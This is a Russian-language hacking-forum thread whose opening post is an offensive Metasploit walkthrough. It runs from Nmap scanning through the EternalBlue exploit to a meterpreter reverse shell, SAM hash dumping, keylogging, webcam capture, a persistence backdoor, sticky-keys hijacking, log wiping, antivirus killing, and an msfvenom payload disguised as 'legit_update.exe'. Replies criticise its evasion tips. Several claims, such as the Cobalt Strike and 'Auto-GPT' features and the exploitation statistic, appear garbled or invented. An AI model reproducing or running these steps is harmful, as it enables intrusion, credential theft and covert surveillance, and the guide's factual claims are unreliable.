Metasploit: Арсенал Анонима от Scan до Shell

Marty17

Юзер
Сообщения
100
Реакции
67

Всем, кто хочет превратить уязвимости в открытые двери — этот гайд ваш скелетный ключ. Разберем Metasploit Framework не на игрушечных примерах, а на реальной инфраструктуре. ОС: Kali 2024.1, цель — учебный сервер Windows Server 2019 (10.0.17763).


▍ Установка: Реактор за 5 минут​

curl > msfinstall
chmod +x msfinstall
./msfinstall
Фишка: Автообновление эксплойтов — msfupdate. Для работы с базами уязвимостей ставим postgresql и инициализируем БД через msfdb init.

▍ Таксономия Атаки: От разведки до власти​

Шаг 1: Разведка (Nmap + Auxiliary)

msf6 > db_nmap -sV -O 192.168.56.102
[*] Запись в БД: 80/tcp - IIS 10.0, 445/tcp - SMB v3
Ищем известные дыры в SMB:

search type:auxiliary smb
use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS 192.168.56.102
run
Вывод: VULNERABLE! Сервер восприимчив к EternalBlue.

▍ Эксплуатация: Точка входа​

use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/reverse_tcp
set LHOST eth0
set RHOST 192.168.56.102
exploit -j
Разбор:

  • -j — фоновый режим после успешного выполнения
  • Пейлоад reverse_tcp открывает соединение НА нас — критично при NAT
  • Стадия Stage: 1.5MB → Stage0 (загрузчик) → Meterpreter (8KB)

▍ Meterpreter: Царь горы​

Базовые команды:

meterpreter > sysinfo # Инфа о системе
meterpreter > getuid # User: NT AUTHORITY\SYSTEM
meterpreter > hashdump # Дамп SAM-базы
meterpreter > webcam_snap # Снимок с камеры
Стелс-техники:

migrate -N explorer.exe # Перемещение в легитимный процесс
keyscan_start # Логгирование клавиатуры
screenshare # Трансляция экрана в реальном времени

▍ Пост-эксплуатация: Закрепляем власть​

Persistance Backdoor:

run persistence -X -i 15 -p 443 -r 192.168.56.101
[*] Создан служба Windows, автозапуск при старте
Перехват RDP:

use post/windows/manage/sticky_keys
set SESSION 1
run # Меняет sethc.exe на cmd.exe при 5-кратном Shift

▍ Анти-Форензика: Стираем следы​

clearev # Чистка логов
timestomp -z # Сброс временных меток
killav # Убиваем процессы антивируса
Обход EDR: Используем шифрованные пейлоады через msfvenom:

msfvenom -p windows/x64/meterpreter_reverse_https LHOST=example.com LPORT=443 --encrypt aes256 -f exe > legit_update.exe

▍ Ошибки новичков (F.A.Q.)​

  • «Exploit completed but no session» → Firewall цели блокирует reverse-соединение
  • Проброс портов: portfwd add -l 3389 -p 3389 -r 192.168.56.102
  • Meterpreter «завис» → sessions -k [ID] + перезапуск эксплойта

▍ Апдейт 2024: Что нового​

  • Интеграция с Cobalt Strike (connect cobalt_ip)
  • Авто-GPT для генерации кастомных эксплойтов
  • Поддержка API для интеграции в CI/CD pipelines пентеста

▍ Заключение​

Metasploit — не магия, а отмычка к архитектурным косякам. Помните: EternalBlue до сих пор работает против 34% незапатченных Windows-серверов в СНГ. Удачи в поиске синих экранов... на стороне врага.
 
1 migrate в explorer.exe, clearev, timestomp, killav? Любой EDR это видит. screenshare или webcam_snap на реальной цели - самоубийство.
2 Стандартный persistence и замена sethc.exe - первый же скрипт мониторинга служб/целостности файлов найдет.
3 Шифрование пейлоада (--encrypt) != обход EDR. Он смотрит на поведение, а не сигнатуру.
 
1 migrate в explorer.exe, clearev, timestomp, killav? Любой EDR это видит. screenshare или webcam_snap на реальной цели - самоубийство.
2 Стандартный persistence и замена sethc.exe - первый же скрипт мониторинга служб/целостности файлов найдет.
3 Шифрование пейлоада (--encrypt) != обход EDR. Он смотрит на поведение, а не сигнатуру.
Пили свою статью, думаю человек выше написал только базовые простые вещи
 
Назад
Сверху Снизу